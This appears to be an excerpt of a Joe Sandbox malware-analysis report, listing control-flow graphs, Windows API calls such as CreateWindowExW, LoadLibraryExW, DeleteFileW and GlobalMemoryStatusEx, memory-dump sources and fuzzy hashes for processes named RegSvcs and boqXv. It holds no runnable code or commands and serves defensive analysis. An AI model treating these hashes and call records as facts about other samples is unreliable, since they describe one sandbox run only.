                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: c554d57ab265491c5ef5399dff2376d3019aec54b1e18168093ae6651d39a8ab
                                                  • Instruction ID: 3a69c2e51e8d159a396534c06aa80a158d68fe05939a65146c1c2d229301e3ec
                                                  • Opcode Fuzzy Hash: c554d57ab265491c5ef5399dff2376d3019aec54b1e18168093ae6651d39a8ab
                                                  • Instruction Fuzzy Hash: 9D8147B0A00B058FD7A8DF29D44579ABBF1FF88304F00892DE49AD7A40DB75E849CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1014 63ad065-63ad067 1015 63ad069-63ad090 call 63aa024 1014->1015 1016 63ad09d-63ad116 1014->1016 1019 63ad095-63ad096 1015->1019 1020 63ad118-63ad11e 1016->1020 1021 63ad121-63ad128 1016->1021 1020->1021 1022 63ad12a-63ad130 1021->1022 1023 63ad133-63ad1d2 CreateWindowExW 1021->1023 1022->1023 1025 63ad1db-63ad213 1023->1025 1026 63ad1d4-63ad1da 1023->1026 1030 63ad220 1025->1030 1031 63ad215-63ad218 1025->1031 1026->1025 1032 63ad221 1030->1032 1031->1030 1032->1032
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 063AD1C2
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 5532b438074935f82d1252f3a6f51f1f01e12e527bced73a00eed74eca302cbc
                                                  • Instruction ID: 0f145ca8c2ac9500418237d7fbefa4dce52c3c4a848664d9869fb49e8c3c9d2f
                                                  • Opcode Fuzzy Hash: 5532b438074935f82d1252f3a6f51f1f01e12e527bced73a00eed74eca302cbc
                                                  • Instruction Fuzzy Hash: FC51DCB1C00349AFDF15CF99C984A9EBFB5BF48310F14816AE918AB220D7719845CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1033 63be629-63be643 1034 63be66d-63be68c call 63bd2c8 1033->1034 1035 63be645-63be66c call 63bd2bc 1033->1035 1041 63be68e-63be691 1034->1041 1042 63be692-63be6f1 1034->1042 1049 63be6f3-63be6f6 1042->1049 1050 63be6f7-63be784 GlobalMemoryStatusEx 1042->1050 1054 63be78d-63be7b5 1050->1054 1055 63be786-63be78c 1050->1055 1055->1054
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506858723.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63b0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 68fc683c8528c93ae7fd80599b943fe5f963e127074e1a10a3c7b99196c9c55e
                                                  • Instruction ID: ff2e6429b64eab5b88edc80f4bbc93c8f6b401a19cf245069e251226c45eea5e
                                                  • Opcode Fuzzy Hash: 68fc683c8528c93ae7fd80599b943fe5f963e127074e1a10a3c7b99196c9c55e
                                                  • Instruction Fuzzy Hash: 59413372E143958FCB14CFA9D8142EEBBF1AF89310F14856ADA05A7281DB749845CBE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1058 63ad0a4-63ad116 1060 63ad118-63ad11e 1058->1060 1061 63ad121-63ad128 1058->1061 1060->1061 1062 63ad12a-63ad130 1061->1062 1063 63ad133-63ad16b 1061->1063 1062->1063 1064 63ad173-63ad1d2 CreateWindowExW 1063->1064 1065 63ad1db-63ad213 1064->1065 1066 63ad1d4-63ad1da 1064->1066 1070 63ad220 1065->1070 1071 63ad215-63ad218 1065->1071 1066->1065 1072 63ad221 1070->1072 1071->1070 1072->1072
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 063AD1C2
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: 5506ac3b3f45a111e4c1abe6aed7f3cb145f8feb06eb05ad19dc52c86e14812f
                                                  • Instruction ID: c38089b5b84eb00b3ffff9c7a1ffecec36baef80c062d92952e14220e8cddef2
                                                  • Opcode Fuzzy Hash: 5506ac3b3f45a111e4c1abe6aed7f3cb145f8feb06eb05ad19dc52c86e14812f
                                                  • Instruction Fuzzy Hash: CA51CEB1D00349AFDB54CF9AD984ADEBFB5FF48310F24812AE819AB210D771A845CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1073 63ad0b0-63ad116 1074 63ad118-63ad11e 1073->1074 1075 63ad121-63ad128 1073->1075 1074->1075 1076 63ad12a-63ad130 1075->1076 1077 63ad133-63ad16b 1075->1077 1076->1077 1078 63ad173-63ad1d2 CreateWindowExW 1077->1078 1079 63ad1db-63ad213 1078->1079 1080 63ad1d4-63ad1da 1078->1080 1084 63ad220 1079->1084 1085 63ad215-63ad218 1079->1085 1080->1079 1086 63ad221 1084->1086 1085->1084 1086->1086
                                                  APIs
                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 063AD1C2
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CreateWindow
                                                  • String ID:
                                                  • API String ID: 716092398-0
                                                  • Opcode ID: dc5e670e96dfeb660aa3e4257b5575f100152fed42d6e34f808c2fb180f877ec
                                                  • Instruction ID: c7628389298dcb8149428eb7ca238560f1d0af4827a67a64dc2063ebf1678f9f
                                                  • Opcode Fuzzy Hash: dc5e670e96dfeb660aa3e4257b5575f100152fed42d6e34f808c2fb180f877ec
                                                  • Instruction Fuzzy Hash: 1C41AEB1D003499FDF54CF9AD984ADEBBB5FF48310F24852AE819AB210D775A845CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1087 63ae01c-63af82c 1090 63af8dc-63af8fc call 63aa04c 1087->1090 1091 63af832-63af837 1087->1091 1098 63af8ff-63af90c 1090->1098 1093 63af88a-63af8c2 CallWindowProcW 1091->1093 1094 63af839-63af870 1091->1094 1095 63af8cb-63af8da 1093->1095 1096 63af8c4-63af8ca 1093->1096 1101 63af879-63af888 1094->1101 1102 63af872-63af878 1094->1102 1095->1098 1096->1095 1101->1098 1102->1101
                                                  APIs
                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 063AF8B1
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: CallProcWindow
                                                  • String ID:
                                                  • API String ID: 2714655100-0
                                                  • Opcode ID: d2fd2087169ed0cf0ffd447ebacf9a6cf700d03a0ae6939177fed2dd9a6458c4
                                                  • Instruction ID: affe80923b443d6c7d98250f8c945ed4cd17e74b977adad24e6d2d4915767d0a
                                                  • Opcode Fuzzy Hash: d2fd2087169ed0cf0ffd447ebacf9a6cf700d03a0ae6939177fed2dd9a6458c4
                                                  • Instruction Fuzzy Hash: 89415AB5900309DFDB54CF5AC488AAABBF9FF88314F24845DD519AB321D775A841CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1104 63a2bf0-63a2bf6 1105 63a2bf8-63a2c8c DuplicateHandle 1104->1105 1106 63a2c8e-63a2c94 1105->1106 1107 63a2c95-63a2cb2 1105->1107 1106->1107
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 063A2C7F
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: 269e3e374cc42dd2e25d02b7346d9caed85c4475651a42229f181defa8d81faf
                                                  • Instruction ID: b495f89a9026d2cff11737115d09ea19b304c5e737f7eb7f91ef491ba1293b7d
                                                  • Opcode Fuzzy Hash: 269e3e374cc42dd2e25d02b7346d9caed85c4475651a42229f181defa8d81faf
                                                  • Instruction Fuzzy Hash: C921D4B5D00349AFDB10CFAAD984ADEBBF4EB48320F14841AE958A7210D374A954CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1110 63a2bf8-63a2c8c DuplicateHandle 1111 63a2c8e-63a2c94 1110->1111 1112 63a2c95-63a2cb2 1110->1112 1111->1112
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 063A2C7F
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: d7b038483b4e83afcd23d73cff6e1ad1a75eef7de2f33300781de0c2166ea236
                                                  • Instruction ID: ef39d22fc6ef051638e9848ae1cc7d43ba54a19c24de03184b0bbfcb2695006a
                                                  • Opcode Fuzzy Hash: d7b038483b4e83afcd23d73cff6e1ad1a75eef7de2f33300781de0c2166ea236
                                                  • Instruction Fuzzy Hash: 1921B3B5D003499FDB10CF9AD984ADEBBF4FB48320F14841AE918A7350D375A954CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1115 51e7348-51e739a 1118 51e739c-51e739f 1115->1118 1119 51e73a2-51e73cd DeleteFileW 1115->1119 1118->1119 1120 51e73cf-51e73d5 1119->1120 1121 51e73d6-51e73fe 1119->1121 1120->1121
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 051E73C0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3503654592.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_51e0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 6c0f12c9707b00054596ba4adc905a5c292555337f1fb3909b3df33bf27fe963
                                                  • Instruction ID: 25145cd2bdcc3b955c5318cecdb10d7f541b81719e506db92c55f27053d20237
                                                  • Opcode Fuzzy Hash: 6c0f12c9707b00054596ba4adc905a5c292555337f1fb3909b3df33bf27fe963
                                                  • Instruction Fuzzy Hash: 782147B2C0065A9BDB10CF9AD545B9EFBB4FF48320F14851AD918A7240D778A900CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1124 63ab31a-63ab360 1126 63ab368-63ab397 LoadLibraryExW 1124->1126 1127 63ab362-63ab365 1124->1127 1128 63ab399-63ab39f 1126->1128 1129 63ab3a0-63ab3bd 1126->1129 1127->1126 1128->1129
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,063AB199,00000800,00000000,00000000), ref: 063AB38A
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: f287b076841734df561db614daa00eca863ae7d5541eafc1da9b2e1c6de2f533
                                                  • Instruction ID: 473f4c54d583efd4083623b6d134a3582c798aeede2b294e6e1ba0ce4f466b84
                                                  • Opcode Fuzzy Hash: f287b076841734df561db614daa00eca863ae7d5541eafc1da9b2e1c6de2f533
                                                  • Instruction Fuzzy Hash: 0911D3B68003499FDB20CF9AD844ADEFBF4EB88720F14842AE559A7240C775A545CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1132 51e7350-51e739a 1134 51e739c-51e739f 1132->1134 1135 51e73a2-51e73cd DeleteFileW 1132->1135 1134->1135 1136 51e73cf-51e73d5 1135->1136 1137 51e73d6-51e73fe 1135->1137 1136->1137
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 051E73C0
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3503654592.00000000051E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_51e0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  • Opcode ID: 8cd7549923136330a25988bd6b9bc5fc012314658e11e2a9c7bf523397f4566e
                                                  • Instruction ID: f2cab97de82e81402cd0da16baabe8f816d66b984705661c89e01b9d56465f58
                                                  • Opcode Fuzzy Hash: 8cd7549923136330a25988bd6b9bc5fc012314658e11e2a9c7bf523397f4566e
                                                  • Instruction Fuzzy Hash: 161133B2C00A5A9BDB14CF9AC544B9EFBB4FF48720F14812AD918A7240D778A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1140 63a9eb0-63ab360 1142 63ab368-63ab397 LoadLibraryExW 1140->1142 1143 63ab362-63ab365 1140->1143 1144 63ab399-63ab39f 1142->1144 1145 63ab3a0-63ab3bd 1142->1145 1143->1142 1144->1145
                                                  APIs
                                                  • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,063AB199,00000800,00000000,00000000), ref: 063AB38A
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 5da0d0fe271a4da7a4ce2048c8cda6df6e5c88849efc34091c00287ad2969305
                                                  • Instruction ID: 0725444b8cc94548ffc645d17161e2cc1081c0686bdc6e8408c159ba8631ff2d
                                                  • Opcode Fuzzy Hash: 5da0d0fe271a4da7a4ce2048c8cda6df6e5c88849efc34091c00287ad2969305
                                                  • Instruction Fuzzy Hash: F41114B6C003099FDB10CF9AC844B9EFBF4EB48320F14842AE959A7240C3B5A544CFA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1148 63be710-63be74e 1149 63be756-63be784 GlobalMemoryStatusEx 1148->1149 1150 63be78d-63be7b5 1149->1150 1151 63be786-63be78c 1149->1151 1151->1150
                                                  APIs
                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 063BE777
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506858723.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63b0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: GlobalMemoryStatus
                                                  • String ID:
                                                  • API String ID: 1890195054-0
                                                  • Opcode ID: 3591c5ad174b856a9b469768331a33fcbae4f821adce372c61efdcc43b6976c0
                                                  • Instruction ID: 3871ac84441045e67376e1b82e174ce1554bbe93906fbe593742ec88af61a399
                                                  • Opcode Fuzzy Hash: 3591c5ad174b856a9b469768331a33fcbae4f821adce372c61efdcc43b6976c0
                                                  • Instruction Fuzzy Hash: 611112B2C0065A9BCB10CF9AC544BDEFBF4BF48320F15812AD918A7241D3B8A954CFE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 063AB11E
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3506740526.00000000063A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_63a0000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: f43ad39ae1b680e725368cb3fc5659aa7b649e4bfe301ad4419e63ffb54cd561
                                                  • Instruction ID: 3911e59bbd1080109ad5116fed332e120becb17c285566fc3db428395d2abaaf
                                                  • Opcode Fuzzy Hash: f43ad39ae1b680e725368cb3fc5659aa7b649e4bfe301ad4419e63ffb54cd561
                                                  • Instruction Fuzzy Hash: 8811E0B6C007498FDB10CF9AD944BDEFBF4EF88224F14842AD419A7210D379A545CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3495224346.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_f3d000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c31eda73de7ed948f3b9a12557074ea2565ee5a67351b5614df54aabe7ce0176
                                                  • Instruction ID: b180c117aaa891a9b3fa9809b1b127abd4fee3a4ced3c8ca80ebe570aa5e2110
                                                  • Opcode Fuzzy Hash: c31eda73de7ed948f3b9a12557074ea2565ee5a67351b5614df54aabe7ce0176
                                                  • Instruction Fuzzy Hash: A92137B6504300DFCB18DF14E5C0B26BB65FB84B34F20C56DD90A0B25AC376D807DA61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.3495224346.0000000000F3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F3D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_f3d000_RegSvcs.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26639fbe52dfdec78a14b713164022d2678610e211d670dad5030763924b9a6d
                                                  • Instruction ID: dc5868d6041561fb1208e0fe85d3ea7e3542e36b667f46c4a95ce9165700b573
                                                  • Opcode Fuzzy Hash: 26639fbe52dfdec78a14b713164022d2678610e211d670dad5030763924b9a6d
                                                  • Instruction Fuzzy Hash: 03217F755093808FCB06CF24D990715BF71AB46624F28C5EAD8498B2A7C33A980ACB62
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1da948cf865fd8a8e9ef2562bccaef04e27c6773d06d5a57e9ebd811427cb4bd
                                                  • Instruction ID: d18649dd267f792d6ffe7c535556351d3a2c922f171e7005769d92e3a7c20158
                                                  • Opcode Fuzzy Hash: 1da948cf865fd8a8e9ef2562bccaef04e27c6773d06d5a57e9ebd811427cb4bd
                                                  • Instruction Fuzzy Hash: 7D323B34701A02DFDB54DF78E4D067A77A6FB88344B148969C5068B399DF3AEC82CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2369b55cce798bed8be0f50c433e18abd5abcd9fb03a4094365e7ae63c12aaed
                                                  • Instruction ID: ea3361a3eab543776a2446e9f83c2dab44d40e4a092bf7c312f8871c721bb3d3
                                                  • Opcode Fuzzy Hash: 2369b55cce798bed8be0f50c433e18abd5abcd9fb03a4094365e7ae63c12aaed
                                                  • Instruction Fuzzy Hash: F681C135A00301CFDB259BB4D4986AEBBF2FF88314F18856EE5425B2A5DF75AC85CB40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9f7032b9c22c338ce16658cb788befcd49d152c47b17b62de5852f1a46d0c35f
                                                  • Instruction ID: fcf1822861233ca9352493b68f4ee4cd179fa51a2daaafa6353b01ac908bcb48
                                                  • Opcode Fuzzy Hash: 9f7032b9c22c338ce16658cb788befcd49d152c47b17b62de5852f1a46d0c35f
                                                  • Instruction Fuzzy Hash: D0311630741610CFC759AB38D49886D3BE2AF8A71536108B8E502CF372DA76DC82CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e7c686c08d53025e53573bc6253eaa2eda4a4b217becbfc40a2c93a9554e9779
                                                  • Instruction ID: db7348c49e46b748f2537d08839dcd41355bf34cd2db57d92bc49b7213a3fc01
                                                  • Opcode Fuzzy Hash: e7c686c08d53025e53573bc6253eaa2eda4a4b217becbfc40a2c93a9554e9779
                                                  • Instruction Fuzzy Hash: E7211634701611CFC758AB39C49881D7BE2AF8A71636118B8EA06CF371DE76DC82CB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4dddcaa3d403c256a530055b266172a5494561dc966942aade1961156b9a3f70
                                                  • Instruction ID: f462e5496b31e8462e148bce8a69b13b05f7c3b126f0f5c295f8b9700557da19
                                                  • Opcode Fuzzy Hash: 4dddcaa3d403c256a530055b266172a5494561dc966942aade1961156b9a3f70
                                                  • Instruction Fuzzy Hash: 88115E76E002069FCB44DFB4D8808EFBBF5FF8931071186AAE515A7221EB759D05CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6fa9c4b0fc865abc154a9a22f0bdc65b98bed909e1a6e3451da5c0fe1793b8d5
                                                  • Instruction ID: 22892dbf9c8a976b9ab04d511c946d5bfae1b559c04e23e536b83497f5597870
                                                  • Opcode Fuzzy Hash: 6fa9c4b0fc865abc154a9a22f0bdc65b98bed909e1a6e3451da5c0fe1793b8d5
                                                  • Instruction Fuzzy Hash: E0012D76E002069FCB44DFA4D8848AFFBB5FF8D310710856AE51597220EB75A915CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c06dae6b3537935d4701ba6b3410641ae909534c3f5c0bfdee7f19a03d75e5b7
                                                  • Instruction ID: a98932a7405a98558b8b7895774581ea76d02fd578901c334b6260fc14e76e52
                                                  • Opcode Fuzzy Hash: c06dae6b3537935d4701ba6b3410641ae909534c3f5c0bfdee7f19a03d75e5b7
                                                  • Instruction Fuzzy Hash: 3BF08C7090A3A5AFC7529BB8AC500DB7FF4EE43324B0504ABE484D7112E2380D14CBE2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 341b6c96a7078d1aad8238170760bdf146f2f3074294f2d10810de5634360c2a
                                                  • Instruction ID: 220e9c2090612b31112646ccf1b36d53af1ff4fa530f89a81dec9229933fcdfa
                                                  • Opcode Fuzzy Hash: 341b6c96a7078d1aad8238170760bdf146f2f3074294f2d10810de5634360c2a
                                                  • Instruction Fuzzy Hash: E7F01C74900715CFDB24DB68C19C79D7BF0BB48718F240858D502AB2A1DBB49884CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7a52824a8baf937d91b023fe841a1c49f373bbe29015a1866c6bf45d4f6d266b
                                                  • Instruction ID: 1dbb60516a04badd3e6c6f1bed3c40ca771cf420840cbd24be6133c021d322db
                                                  • Opcode Fuzzy Hash: 7a52824a8baf937d91b023fe841a1c49f373bbe29015a1866c6bf45d4f6d266b
                                                  • Instruction Fuzzy Hash: 63D05B357002149FC710DB79E949A553B7CEF0D711F514095EA04CB250EB72EC14CBD1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 0000001A.00000002.2484077760.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_26_2_1540000_boqXv.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 463d974db67f69d3871b946ba144d799cb4676e7e8d360008925b7b380775be9
                                                  • Instruction ID: 54852a5c2b2f70e6984d0d257125bfae16d3f67d676a212c411e876c03b0747b
                                                  • Opcode Fuzzy Hash: 463d974db67f69d3871b946ba144d799cb4676e7e8d360008925b7b380775be9
                                                  • Instruction Fuzzy Hash: 8FD017B1D01229AF8B40EFB899051DEBBF8FE08250B100566D90AE3200E2704A108BE1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%